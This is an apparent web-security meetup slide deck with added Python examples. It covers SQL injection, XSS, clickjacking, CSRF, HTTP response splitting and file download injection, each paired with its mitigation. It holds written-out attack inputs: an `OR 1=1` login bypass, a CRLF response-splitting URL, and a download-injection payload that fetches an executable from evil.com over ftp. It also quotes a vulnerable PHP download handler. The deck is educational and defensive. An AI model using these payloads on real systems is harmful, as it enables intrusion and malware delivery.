Trendy Web Security
lawebdevmeetup
8/14/2019 Trendy Web Security
-
A Review of times past
-
SQL Injection
-
password' OR 1=1; --
-
Parses as:
SELECT username FROM users WHERE username = 'username' and password = '' OR 1=1
-
And you're in...
-
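Added example, not from the slides: the login query above built two ways in Python with sqlite3, so the effect of the `password' OR 1=1; --` input from the slide can be checked directly. The in-memory users table, its rows and the function names are constructed for the demo; the fix shown is the parameterized query, which every current database driver supports.

```python
import sqlite3

def make_db():
    """Constructed sample data: an in-memory users table for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "correct horse battery staple"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    """String concatenation, as on the slide: the input becomes part of the SQL.
    'and' binds tighter than 'OR', so the injected OR 1=1 matches every row."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' and password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Parameterized query: values travel separately from the SQL text, so a
    quote, OR or -- in the input is just data compared against the column."""
    sql = "SELECT username FROM users WHERE username = ? and password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

SLIDE_INPUT = "password' OR 1=1; --"   # the password field value from the slide

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "username", SLIDE_INPUT))  # admin
    print("safe:      ", login_safe(db, "username", SLIDE_INPUT))        # None
```

The vulnerable version returns the first row of the table (here the admin account) without knowing any password; the parameterized version returns nothing for the same input and still works for a real username and password pair.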
Cross Site Scripting (XSS)
-
About-Me field
I enjoy long walks on the beach, and
-
Now, you have your code running in
another guy's browser
-
Have your code change his linksys' DNS settings?
-
SQL Injections and XSS attacks are old news.
-
What's new(er)?
-
Click Jacking
-
A Demo...
-
No JS Needed!
-
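Added example, not from the slides: the defence against clickjacking also needs no JavaScript. It is a pair of response headers, and a site can audit itself by checking what it sends. The checker below classifies a response's framing policy (CSP frame-ancestors wins over X-Frame-Options in current browsers) and the second function returns the headers a page with sensitive clicks should send. Function names and the sample header sets are constructed for the demo.

```python
def frame_policy(headers):
    """Classify a response as 'blocked', 'same-origin', 'restricted'
    (explicit allowlist) or 'framable' from its headers alone."""
    lower = {k.lower(): v for k, v in headers.items()}
    csp = lower.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            if sources == ["none"]:
                return "blocked"
            if sources == ["self"]:
                return "same-origin"
            return "restricted"
    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return "blocked"
    if xfo == "SAMEORIGIN":
        return "same-origin"
    # No framing restriction at all: any page can overlay this one.
    return "framable"

def hardened_headers(allow_self=False):
    """Headers to send on pages that carry state-changing buttons.
    Both are set so old browsers that only know X-Frame-Options are covered."""
    if allow_self:
        return {"Content-Security-Policy": "frame-ancestors 'self'",
                "X-Frame-Options": "SAMEORIGIN"}
    return {"Content-Security-Policy": "frame-ancestors 'none'",
            "X-Frame-Options": "DENY"}

if __name__ == "__main__":
    # Constructed sample: a page that sets a CSP but forgot frame-ancestors.
    print(frame_policy({"Content-Security-Policy": "default-src 'self'"}))  # framable
    print(frame_policy(hardened_headers()))                                 # blocked
```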
Cross Site Request Forgery
-
You are now logged out of Google.
-
Or... had your domain stolen
-
CSRF creates a new Gmail filter which forwards certain emails
Hacker sends an email forwarded to your host, asking for a transfer + unlock
Hacker transfers your domain away.
-
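Added example, not from the slides: the server-side check that stops the filter-creation request above from working when it comes from another site. It combines the two programmer mitigations given later in the deck (only POST may change state; everything else is allowlisted) with a per-session token compared in constant time and an Origin/Referer check. The site origin, the session store, the request dict layout and the function names are constructed for the demo.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://mail.example"   # constructed stand-in for the real site
session_tokens = {}                    # constructed stand-in for server-side session storage

def issue_token(session_id):
    """Create a per-session secret; embed it in every state-changing form."""
    token = secrets.token_urlsafe(32)
    session_tokens[session_id] = token
    return token

def origin_of(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()

def csrf_check(request):
    """request is a plain dict with keys method, headers, cookies, form.
    Returns (allowed, reason)."""
    if request["method"].upper() in ("GET", "HEAD", "OPTIONS"):
        # Safe methods must never change state, so nothing here to protect;
        # a logout or filter change reachable by GET is the bug, not the check.
        return True, "safe method"
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    source = headers.get("origin") or headers.get("referer")
    if source and origin_of(source) != SITE_ORIGIN:
        return False, "cross-origin request"
    expected = session_tokens.get(request.get("cookies", {}).get("session"))
    supplied = request.get("form", {}).get("csrf_token", "")
    # The browser attaches the session cookie automatically to a forged request,
    # but the attacker's page cannot read the token bound to that session.
    if expected is None or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid csrf token"
    return True, "token matches session"

if __name__ == "__main__":
    token = issue_token("sess-1")
    forged = {"method": "POST", "headers": {"Origin": "https://evil.example"},
              "cookies": {"session": "sess-1"}, "form": {"action": "create_filter"}}
    print(csrf_check(forged))   # (False, 'cross-origin request')
```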
HTTP Response Splitting
-
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam
/redir_lang.jsp?lang=English
-
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

Shazam
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with
Content-Type: text/html
Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9UsS!-1251019693; path=/
Connection: Close

302 Moved Temporarily
This document you requested has moved temporarily.
It's now at http://10.1.1.1/by_lang.jsp?lang=foobar
-
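Added example, not from the slides: the redirect above reproduced in Python so the split can be seen, next to the one-line fix. The query parameter is decoded as a servlet container would, pasted into the Location header by the vulnerable builder, and the byte stream is then read back the way a naive client or proxy reads it (status line, headers, Content-Length bytes of body, repeat). The safe builder refuses any value containing CR, LF or other control characters. The two request URLs are the slide's; the function names and the response layout are constructed for the demo.

```python
from urllib.parse import parse_qs, urlsplit

# The two requests shown on the slide, reused here as constructed test input.
BENIGN_URL = "/redir_lang.jsp?lang=English"
ATTACK_URL = ("/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/"
              "1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019"
              "%0d%0a%0d%0aShazam")

def lang_param(url):
    """Decode the lang query parameter the way the container hands it to the page."""
    return parse_qs(urlsplit(url).query)["lang"][0]

def render_redirect(lang):
    """Format the 302 with no checks; used by both builders below."""
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Location: http://10.1.1.1/by_lang.jsp?lang=" + lang + "\r\n"
            "Content-Length: 0\r\n\r\n")

def redirect_vulnerable(lang):
    """The bug: the decoded value, CR/LF included, goes straight into a header."""
    return render_redirect(lang)

def header_value_ok(value):
    """A header value may not contain CR, LF or any other control character."""
    return not any(ord(c) < 0x20 or ord(c) == 0x7f for c in value)

def redirect_safe(lang):
    """Same response, but a value that could end the header line is refused."""
    if not header_value_ok(lang):
        raise ValueError("refusing CR/LF in header value")
    return render_redirect(lang)

def split_responses(raw):
    """Read a response stream like a naive client: returns [(status_line, body)].
    Stops at the first message whose status line is not an HTTP status line."""
    messages = []
    pos = 0
    while pos < len(raw):
        end = raw.find("\r\n\r\n", pos)
        if end < 0:
            break
        head = raw[pos:end].split("\r\n")
        status = head[0]
        if not status.startswith("HTTP/"):
            break
        length = 0
        for line in head[1:]:
            name, _, value = line.partition(":")
            if name.strip().lower() == "content-length":
                length = int(value.strip())
        body = raw[end + 4:end + 4 + length]
        messages.append((status, body))
        pos = end + 4 + length
    return messages

if __name__ == "__main__":
    for status, body in split_responses(redirect_vulnerable(lang_param(ATTACK_URL))):
        print(status, "->", repr(body))
```

Run stand-alone, the vulnerable builder yields two messages for the attack URL: the 302 the server meant to send and the attacker's 200 with "Shazam" as its body, which is what a shared cache in front of the server would store under the redirect's URL.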
Why?
Cache Poisoning
Replace content
Phishing
XSS
etc.
-
File Download Injection
-
A similar idea to response splitting
-
We've all written download scripts:
download.php?file=report.xls
-
$filename = basename($_GET["download"]);
// the header value is built from the request parameter, so CR/LF in it ends the header line
header('Content-Disposition: attachment; filename="' . $filename . '"');
readfile(basename($_GET["download"]));
return;
-
http://[trusted_domain]/download.php?file=attack.bat%0d%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A%20evil.com%0d%0awzinet95.exe
-
HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 05:02:24 GMT
Server: Apache
Path=/download
Content-Disposition: attachment;filename=attack.bat
Content-length: 88

echo get /pub/winzip/wzinet95.exe|ftp -A evil.com
wzinet95.exe
Content-Length: 0
Content-Type: application/octet-stream;charset=euc-kr
-
It's a dangerous world...
-
How about some Mitigation
-
As a user:
Sensitive stuff in a separate browser?
-
As a programmer:
Whitelist everything. Nothing gets through
w/o you knowing
-
As a programmer:
GET vs. POST. Use them correctly.
-
Download Injection:
Use the real file name, and not the http
argument
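Added example, not the slides' own code: the download handler rewritten in Python the way the mitigation above describes. The requested name is matched against the real directory listing, so only a name the server actually has is ever served, and the Content-Disposition value is built from that real name rather than the HTTP argument, with a control-character check and RFC 6266 quoted-string escaping as defence in depth. The temp directory, the sample file and the function names are constructed for the demo; the attack string is the slide's, decoded.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Decoded form of the file argument from the slide, used as constructed test input.
ATTACK_NAME = unquote("attack.bat%0d%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe"
                      "|ftp%20-A%20evil.com%0d%0awzinet95.exe")

def make_download_dir():
    """Constructed sample: a temp directory with the one file we intend to serve."""
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "report.xls"), "wb") as fh:
        fh.write(b"constructed spreadsheet bytes")
    return base

def content_disposition(real_name):
    """Build the header from a name the server already trusts. Control characters
    are still refused, and quote/backslash are escaped per RFC 6266 quoting."""
    if re.search(r"[\x00-\x1f\x7f]", real_name):
        raise ValueError("control characters in file name")
    quoted = real_name.replace("\\", "\\\\").replace('"', '\\"')
    return f'attachment; filename="{quoted}"'

def serve_download(base_dir, requested):
    """Resolve the request against the real directory listing, never against
    the raw argument. Returns (status, headers, body)."""
    catalogue = {name: os.path.join(base_dir, name) for name in os.listdir(base_dir)}
    path = catalogue.get(requested)   # exact match on a real file name only
    if path is None:
        return 404, {}, b""
    with open(path, "rb") as fh:
        body = fh.read()
    headers = {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": content_disposition(os.path.basename(path)),
        "Content-Length": str(len(body)),
    }
    return 200, headers, body

if __name__ == "__main__":
    base = make_download_dir()
    print(serve_download(base, "report.xls")[0])   # 200
    print(serve_download(base, ATTACK_NAME)[0])    # 404
```

Because the lookup key must equal a name that exists on disk, the CRLF-laden argument from the slide, a traversal such as ../report.xls, or any other fabricated name all end in a 404 before a header is ever written.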
-
Links
http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html
http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html
http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf
http://www.breakingpointsystems.com/community/blog/clickjacking
http://en.wikipedia.org/wiki/Cross-site_request_forgery
http://www.davidairey.com/google-gmail-security-hijack/
http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html